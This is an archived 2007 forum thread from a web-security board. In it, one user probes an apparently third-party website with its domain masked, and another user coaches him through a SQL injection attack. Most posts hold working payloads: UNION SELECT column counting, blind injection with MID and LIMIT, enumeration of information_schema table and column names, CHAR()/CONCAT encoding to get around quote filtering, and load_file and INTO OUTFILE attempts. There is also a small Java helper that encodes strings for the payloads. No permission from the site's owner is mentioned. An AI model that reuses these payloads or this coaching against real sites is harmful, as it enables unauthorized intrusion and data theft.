Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
Possible Sql Injection?
Posted by: Jiu
Date: November 14, 2007 12:12PM

Hi all,

I just discover your site, and i have some questions ^^

There is a site like that:

hxxp://www.***.com/***.php?id=24

When I try that:

hxxp://www.***.com/***.php?id='
that a do an error =>
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"
Ok, magic_quote is on :S

Now i try that
hxxp://www.***.com/***.php?id=24 union select null--
=> "The used SELECT statements have a different number of columns"
Perhaps a sql is possible? so i continue for find the number of column

When i try hxxp://www.***.com/***.php?id=24 union select null,null,null,null--
thats works! that display the site

But where there is the text normally, that marks again "The used SELECT statements have a different number of columns" why? ^^'

If there is no possible injection, say me too :S

thx

Jiu

P.s: Sorry for my english ^^'

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Anonymous User
Date: November 14, 2007 12:47PM

Maybe this will interest you:

1 AND(SELECT * FROM table2 ) = 1 

In the query:

SELECT * FROM table where id = 1 AND(SELECT * FROM table2 ) = 1 

This outputs: "Operand should contain N column(s)" 

where N is the number of columns in table 2

I use this to detect the N columns, probably the easiest way to detect.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 14, 2007 02:06PM

Thx for your answer ^^

I try, but i dont have the name of table :S

when i put in url like that (I hope that's how do you explain):

hxxp://www.***.com/***.php?id=24 union SELECT*FROM table where id = 1 AND (SELECT*FROM table2) = 1

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table where id = 1 AND(SELECT * FROM table2 ) = 1' at line 1"

then i try that:

hxxp://www.***.com/***.php?id=24 union SELECT * FROM table

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table' at line 1"

then with

hxxp://www.***.com/***.php?id=24 union%20SELECT * FROM table2

"Table '***.table2' doesn't exist"

I deduct that table is a valid table, i'm right?

Jiu

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 14, 2007 06:57PM

Quote

When i try hxxp://www.***.com/***.php?id=24 union select null,null,null,null--
thats works! that display the site

But where there is the text normally, that marks again "The used SELECT statements have a different number of columns" why? ^^'

I guess it's because the variable "id" is parsed through 2 queries. The first SELECTs from 4 columns, as you found out, the second may SELECT from a different amount of columns and throws a error. However you've already proven that SQL injection is possible, so don't worry about the second query and inject whatever you want to the first by using union select with 4 columns.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 19, 2007 02:00PM

Ok i try to do with the first select

I read your article on "how to find name table" with information_schema.tables

But i cant see the output, so i try to do with a blind sql.

i try that hxxp://www.***.com/***.php?id=24 AND MID(version(),1,1) like 4--
that dont display the window

i try that hxxp://www.***.com/***.php?id=24 AND MID(version(),1,1) like 5--
ok mysql version is 5.

hxxp://www.***.com/***.php?id=24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 5 LIMIT 1),1,1) > m--

(the "version" is the version of mysql or something other?)

i obtain " Unknown column 'm' in 'where clause' "

Jiu

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 19, 2007 02:29PM

you forgot to quote the 'm'
24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) > 'm' /*
Chars always have to be quoted, else they will get parsed as identifiers.

in this case "version" is a column of the information_schema table and has nothing to do with the MySQL version. It's just a unique value I use to find only on user generated tables. I'll try to make that more clear in my article ;)

Also note that this is a blind SQL technique. Maybe you can try something like:
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT table_name,null,null,null FROM information_schema.tables WHERE version = 9 /*

Feel free to post any other incomprehensiblenesses (what a word ;)

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 19, 2007 03:03PM

Thx for your answer

Arf, i dont have access to simple quote ^^'

I must use blind sql, because with union, i cant see the output :S
(that will appair on the page no?)

i try something with Concat like that:

hxxp://www.***.com/***.php?id=24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) < CONCAT(CHAR(39),CHAR(97),CHAR(39))--

==> < 'a'

but doesnt works xD

hxxp://www.***.com/***.php?id=24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) < CHAR(97)--

but doesnt works too...

I try if the first letter is 'a' too :)

Perhaps i dont use correctly the Char() or the Concat() ^^'

Jiu

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 19, 2007 03:18PM

that query is correct:
hxxp://www.***.com/***.php?id=24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) < CHAR(97)

but that tries if the first letter of the table name is smaller than 'a' which is unlikely ;) You may want to try if its bigger (>) or smaller than 'm', die middle of the alphabet ;) Then border down your result step by step until you find the right letter.
If the result is correct, the normal page with id=24 appears, otherwise you should see something different.

Maybe you try
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,333,444 /*
first, and then look if one of the numbers appears in the source code. If so, replace this column with your injection.
For example you see 333 in the sourcecode, than you can use:
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,table_name,444 FROM information_schema.tables WHERE version = 9 LIMIT 1
Just a test. If you cant find any of the injected numbers, you have to continue using blind SQLi.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 19, 2007 03:41PM

if there are any problems with version=9 you have to think up another way to limit the result only on one user generated table, since you dont want to brufeforce the system table names.
You could also try:

24 AND (SELECT count(*) FROM information_schema.tables) = 34

to find out how many entries the information_schema.tables table has, and then begin with bruting the last one (user generated tables are usually stored at the bottom of the table):

24 AND MID((SELECT table_name FROM information_schema.tables LIMIT 33,1),1,1) > CHAR(109)

which will look if the 34th table name (usually the first user generated table) starts with a letter bigger than 'm'.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 20, 2007 10:13AM

Yes i have try with > 'a'

hxxp://www.***.com/***.php?id=24 AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) > CHAR(97)

But doenst wokrs, perhaps the "version=9" is wrong ^^'

I do what you say too
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,333,444--

The "333" appair in the source in the title

Then i do
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,table_name,444 FROM information_schema.tables WHERE version = 9 LIMIT 1

But nothing appair in source code ^^'
So i must continue in blind sql or its the "version=9"?

Perhaps i will make a little program who can search valid table by Wordlist ^^

Jiu



Edited 1 time(s). Last edit at 11/20/2007 10:15AM by Jiu.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 20, 2007 01:59PM

Does the user name appear in the title (just for testing)?
hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,user(),444 /*

I guess you dont have access on the information.schema table ... try this (without the version=9 thing):

hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,table_name,444 FROM information_schema.tables LIMIT 1

this should give you a table name in the title (its probably not a user generated table but another system table, like "CHARACTER_SETS")

If the user() thing worked, but it doesnt display anything from the information_schema table, you probably don't have access to it.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 20, 2007 02:24PM

I try it with success! I have all the table_name and all the column_name =D

(without see the message ^^)

But now, how can i know what column is on what table? xD

thx

Jiu

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 20, 2007 02:52PM

Hi, good news. please dont forget to write how you did it to help other readers :)

I would try to check information_schema.columns like:

UNION SELECT column_name FROM information_schema.columns WHERE table_name = "thetablename"
(only replace "thetablename" with what you have found)

this will fetch all column names in that table. If you can access only one at a time use LIMIT 0,1 to get the first, LIMIT 1,1 to get the second, LIMIT 2,1 for the third and so on.

UNION SELECT column_name FROM information_schema.columns WHERE table_name = "thetablename" LIMIT 0,1



Edited 1 time(s). Last edit at 11/20/2007 02:55PM by Reiners.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 20, 2007 03:16PM

To find table and column i do what do you say:

hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,table_name,444 FROM information_schema.tables LIMIT 1,1
the table_name was in the title and i just change the limit like LIMIT 2,1 => LIMIT 3,1 (i begin at 15, because the first table are already define by MySQL)

Same for column but with hxxp://www.***.com/***.php?id=24 AND 1=0 UNION SELECT 111,222,column_name,444 FROM information_schema.columns LIMIT 1,1
(begin with 100 because the first column are already define)

Now i try to find from witch table come the columns:
hxxp://www.***.com/***.php?id=24 UNION SELECT column_name FROM information_schema.columns WHERE table_name = "thetablename" LIMIT 0,1

And that give that: Unknown column 'thetablename' in 'where clause'
Perhaps because i must quote the tablename? But i dont have access to quote...
Can i use Concat(Char(),Char(),...,Char()) ?

thx

Jiu

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 20, 2007 04:12PM

as posted above
Quote

replace "thetablename" with what you have found
... so if you found out "users" is a table name, you get all column names for "users" with:

hxxp://www.***.com/***.php?id=24 UNION SELECT column_name FROM information_schema.columns WHERE table_name = "users" LIMIT 0,1

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 21, 2007 03:29AM

Yeah i know for the tablename, just say that because i have try with a lot of table...

But I dont have access to quote and double quote and without quote, that give me Unknown column 'thetablename' in 'where clause'

So i ask you if i can use concat ? ^^

Jiu

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 21, 2007 12:05PM

yes, you can :)
I recommend using .mario's toCharCode()

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 21, 2007 01:16PM

Ok thx, that works ^^

hxxp://www.***.com/***.php?id=24 and 0=1 union select null,null,column_name,null from information_schema.columns where table_name = CONCAT(Char(97),Char(99),Char(99),Char(117),Char(101),Char(105),Char(108)) Limit 0,1

I obtain the column from the table "accueil" :)

Now if you have a website who convert a String in a sequence of Char(), i take :p

Jiu

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 21, 2007 04:43PM

mario quickly implemented this in his PHP charset encoder. thanks mario ;)

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 22, 2007 04:58AM

Think it doesnt work or i dont use it correctly

I just create this javacode ^^

import java.util.Scanner;
public class test {
private static Scanner scanner = new Scanner(System.in);
public static void main(String[] args) {
System.out.print("Enter a String: ");
String t = scanner.next();
char [] ch = t.toCharArray();
for(int i=0;i<ch.length;i++){
System.out.print("CHAR("+(int)ch+"),");
}
}
}

Ok its basic xD I must do that you can inject the url directly, but i have no time for the moment (i'll do that in Perl normally)

After i found the column from table, can i must update something?

Like 24 update table_name set column_name = 'blabla'; ?

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 22, 2007 09:28AM

use marios php charset encode. type in the tablename in the first box and then select the option "to SQL char()" above this box near "convert:".

Your java code doesnt work because you use "(int)ch", which type casts the letter to int, which does not mean that this will return the char code of this letter.

On MySQL you cant use INSERT as a subquery of SELECT. And you cant use a semicolon or something to start a new query, that doesnt work on MySQL either. So you cant update/insert anything as long as you dont find a vulnerable INSERT query on that page.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 22, 2007 10:41AM

In java, when you cast a char with int, that give you the number of the char ^^

So that wokrs (i obtain same result that mario) :)

And to simplify thing i do that

import java.util.Scanner;
public class test {
private static Scanner scanner = new Scanner(System.in);
public static void main(String[] args) {
System.out.print("Enter a String: ");
String t = scanner.next();
String [] g = t.split(",");
char[] ch;
for (int i=0;i<g.length;i++){
ch = g.toCharArray();
for(int j=0;j<ch.length;j++){
System.out.print(",CHAR("+(int)ch[j]+")");
}
System.out.println();
}
}
}

Just put yours tablenames with a "," between each tablenames, and you got all the char result ^^



Edited 1 time(s). Last edit at 11/22/2007 12:32PM by Jiu.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 22, 2007 10:50AM

ah ok, sry I got you wrong, I thought your code was not working and that was the first thing I thought of when looking through without testing. But it works good indeed ;)

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 22, 2007 12:40PM

So When i have table and column, what i can do?

There is no user table and no password ^^'
And like you said, i cant update :p

Jiu

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 22, 2007 01:36PM

^^ you should have thought about what you want to do in the beginning ;)
try load_file, INTO outfile. Otherwise there is nothing interesting I can think of if there is nothing else stored in the DB.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 22, 2007 02:50PM

Ok i try that

hxxp://www.***.com/***.php?id=24 and 1=0 union select null,null,load_file(CONCAT(/../../../../file.txt)),null--

seems that doesnt work (perhaps wrong syntax)(doesnt display anything)

and when i try

hxxp://www.***.com/***.php?id=24 and 1=0 union select * from accueil into outfile(CONCAT(hxxp://mysite.com/file.txt))

that do:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(CONCAT(CHAR(104),CHAR(116),CHAR(116),CHAR(112),CHAR(58),CHAR(47),CHAR(47),CHAR(' at line 1

Seems that i cant use it or because i use wrong syntax?

Thx
Jiu



Edited 1 time(s). Last edit at 11/22/2007 04:33PM by Jiu.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 24, 2007 07:55PM

regarding to your first url, load_file():
use concat(char(),char() ...) and make sure the file exists. Furthermore make sure you have the FILE privilege.

regarding to your second url, INTO OUTFILE:
you got the wrong INTO OUTFILE syntax, you have to use quotes (there is no way to avoid this):
... into outfile 'file.txt'

And think about your target again ... wouldn't it be scary if everyone could use MySQL to write on any webserver? ;)

More about the FILE privilege, how to find out if you have it and about INTO OUTFILE can be found in this article.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 25, 2007 02:57PM

hxxp://www.xxx.com/xxx.php?id=24 and 1=0 union select null,null,file_priv,null FROM mysql.user WHERE user = CONCAT(Char(),Char(),...)-- (The username of server in the CONCAT)
I obtain:
SELECT command denied to user 'username'@'server' for table 'user'

so i think that i dont have file privilege? :(

Jiu

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Reiners
Date: November 25, 2007 06:47PM

that means you have no access to the mysql.user table, as the error says.

Options: ReplyQuote
Re: Possible Sql Injection?
Posted by: Jiu
Date: November 26, 2007 11:34AM

So how can i know if i have file privilege? ^^

Your article are nice and learn good how to inject code ^^

Jiu

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.